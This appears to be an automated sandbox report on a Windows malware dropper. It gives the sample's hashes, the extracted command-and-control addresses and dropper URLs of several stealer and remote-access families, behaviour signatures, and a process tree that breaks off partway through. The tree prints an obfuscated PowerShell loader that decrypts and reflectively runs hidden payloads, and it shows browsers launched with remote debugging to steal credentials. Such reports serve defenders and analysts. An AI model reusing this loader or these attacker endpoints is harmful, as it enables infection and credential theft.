Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-02-2025 02:49

General

  • Target

    22e3d26fae68cfca1eb87a0341dc3b8dfa0937f47c26b6aa23ed828cab0a6bf0.exe

  • Size

    2.0MB

  • MD5

    da013399e13811ab7a5f1ea197773829

  • SHA1

    91ad2313b83426686c4594c02ccbe97b92e714fe

  • SHA256

    22e3d26fae68cfca1eb87a0341dc3b8dfa0937f47c26b6aa23ed828cab0a6bf0

  • SHA512

    f84c24a857a6a874e25d132ffebdd22443e8149424f961ea604812f7004a63705e970c4c22cb488baa5bd47b34215142a36eef47159129dcaf66a0de219c55fd

  • SSDEEP

    49152:5ojBIGhDjjr6UQd0/yfSdKjA6jbDWl2HLWfxan5ejm:OGGhK9daKA6jTrWE5W

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

redline

Botnet

cheat

C2

103.84.89.222:33791

Extracted

Family

xworm

Version

5.0

C2

45.154.98.175:7000

Mutex

0HzpJoisb4u9PgIO

Attributes
  • Install_directory

    %AppData%

  • install_file

    google_updates.exe

aes.plain

Extracted

Family

stealc

Botnet

default

C2

http://ecozessentials.com

Attributes
  • url_path

    /e6cb1c8fc7cd1659.php

Extracted

Family

systembc

C2

cobolrationumelawrtewarms.co:4001

93.186.202.3:4001

Attributes
  • dns

    5.132.191.104

    ns1.vic.au.dns.opennic.glue

    ns2.vic.au.dns.opennic.glue

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Xworm Payload 2 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Redline family
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 2 IoCs
  • Sectoprat family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

  • Systembc family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 14 IoCs
  • Blocklisted process makes network request 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 22 IoCs
  • Uses browser remote debugging 2 TTPs 9 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 28 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Executes dropped EXE 31 IoCs
  • Identifies Wine through registry keys 2 TTPs 14 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Windows directory 3 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 5 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 53 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of FindShellTrayWindow 55 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\22e3d26fae68cfca1eb87a0341dc3b8dfa0937f47c26b6aa23ed828cab0a6bf0.exe
    "C:\Users\Admin\AppData\Local\Temp\22e3d26fae68cfca1eb87a0341dc3b8dfa0937f47c26b6aa23ed828cab0a6bf0.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:3880
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4884
      • C:\Users\Admin\AppData\Local\Temp\1014060001\8c12de9356.exe
        "C:\Users\Admin\AppData\Local\Temp\1014060001\8c12de9356.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4240
        • C:\Users\Admin\AppData\Local\Temp\1014060001\8c12de9356.exe
          "C:\Users\Admin\AppData\Local\Temp\1014060001\8c12de9356.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:1392
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4240 -s 956
          4⤵
          • Program crash
          PID:2716
      • C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe
        "C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4452
        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2904
      • C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe
        "C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:1964
      • C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe
        "C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4300
        • C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe
          "C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:4344
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4300 -s 968
          4⤵
          • Program crash
          PID:3668
      • C:\Users\Admin\AppData\Local\Temp\1071276001\Fe36XBk.exe
        "C:\Users\Admin\AppData\Local\Temp\1071276001\Fe36XBk.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Writes to the Master Boot Record (MBR)
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2044
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1073578041\tYliuwV.ps1"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops startup file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4928
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3928
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2824
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            5⤵
            • Blocklisted process makes network request
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2476
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4488
      • C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe
        "C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3516
      • C:\Users\Admin\AppData\Local\Temp\1076269001\DTQCxXZ.exe
        "C:\Users\Admin\AppData\Local\Temp\1076269001\DTQCxXZ.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2180
      • C:\Users\Admin\AppData\Local\Temp\1076858001\TaVOM7x.exe
        "C:\Users\Admin\AppData\Local\Temp\1076858001\TaVOM7x.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        PID:2136
        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:4448
      • C:\Users\Admin\AppData\Local\Temp\1078317001\d2YQIJa.exe
        "C:\Users\Admin\AppData\Local\Temp\1078317001\d2YQIJa.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4564
      • C:\Users\Admin\AppData\Local\Temp\1078482001\sHN20me.exe
        "C:\Users\Admin\AppData\Local\Temp\1078482001\sHN20me.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:3352
      • C:\Users\Admin\AppData\Local\Temp\1081729001\spoDnGT.exe
        "C:\Users\Admin\AppData\Local\Temp\1081729001\spoDnGT.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:3736
      • C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe
        "C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        PID:4400
        • C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe
          "C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"
          4⤵
          • Executes dropped EXE
          PID:2216
        • C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe
          "C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:1084
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4400 -s 976
          4⤵
          • Program crash
          PID:1680
      • C:\Users\Admin\AppData\Local\Temp\1083218001\qFqSpAp.exe
        "C:\Users\Admin\AppData\Local\Temp\1083218001\qFqSpAp.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2980
      • C:\Users\Admin\AppData\Local\Temp\1083537001\m5UP2Yj.exe
        "C:\Users\Admin\AppData\Local\Temp\1083537001\m5UP2Yj.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        PID:4584
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4584 -s 1508
          4⤵
          • Program crash
          PID:5112
      • C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe
        "C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        PID:4392
        • C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe
          "C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          PID:5032
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
            5⤵
            • Uses browser remote debugging
            • Enumerates system info in registry
            • Modifies data under HKEY_USERS
            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            PID:2028
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd636dcc40,0x7ffd636dcc4c,0x7ffd636dcc58
              6⤵
                PID:4460
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1876,i,15785985614535483745,17717664187743174648,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1872 /prefetch:2
                6⤵
                  PID:448
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2204,i,15785985614535483745,17717664187743174648,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2216 /prefetch:3
                  6⤵
                    PID:3916
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2276,i,15785985614535483745,17717664187743174648,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2472 /prefetch:8
                    6⤵
                      PID:1080
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3196,i,15785985614535483745,17717664187743174648,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3216 /prefetch:1
                      6⤵
                      • Uses browser remote debugging
                      PID:3404
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3220,i,15785985614535483745,17717664187743174648,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3268 /prefetch:1
                      6⤵
                      • Uses browser remote debugging
                      PID:1036
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4392,i,15785985614535483745,17717664187743174648,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4556 /prefetch:1
                      6⤵
                      • Uses browser remote debugging
                      PID:4020
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4840,i,15785985614535483745,17717664187743174648,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4296 /prefetch:8
                      6⤵
                        PID:540
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4836,i,15785985614535483745,17717664187743174648,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4976 /prefetch:8
                        6⤵
                          PID:1088
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4916,i,15785985614535483745,17717664187743174648,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4904 /prefetch:8
                          6⤵
                            PID:540
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4924,i,15785985614535483745,17717664187743174648,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4912 /prefetch:8
                            6⤵
                              PID:4620
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                            5⤵
                            • Uses browser remote debugging
                            • Enumerates system info in registry
                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                            • Suspicious use of FindShellTrayWindow
                            PID:2232
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd636e46f8,0x7ffd636e4708,0x7ffd636e4718
                              6⤵
                              • Checks processor information in registry
                              • Enumerates system info in registry
                              PID:2512
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,10551888111812761084,7713445407741580889,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
                              6⤵
                                PID:2508
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,10551888111812761084,7713445407741580889,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:3
                                6⤵
                                  PID:4192
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,10551888111812761084,7713445407741580889,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2948 /prefetch:8
                                  6⤵
                                    PID:2184
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2092,10551888111812761084,7713445407741580889,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
                                    6⤵
                                    • Uses browser remote debugging
                                    PID:1592
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2092,10551888111812761084,7713445407741580889,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
                                    6⤵
                                    • Uses browser remote debugging
                                    PID:1932
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
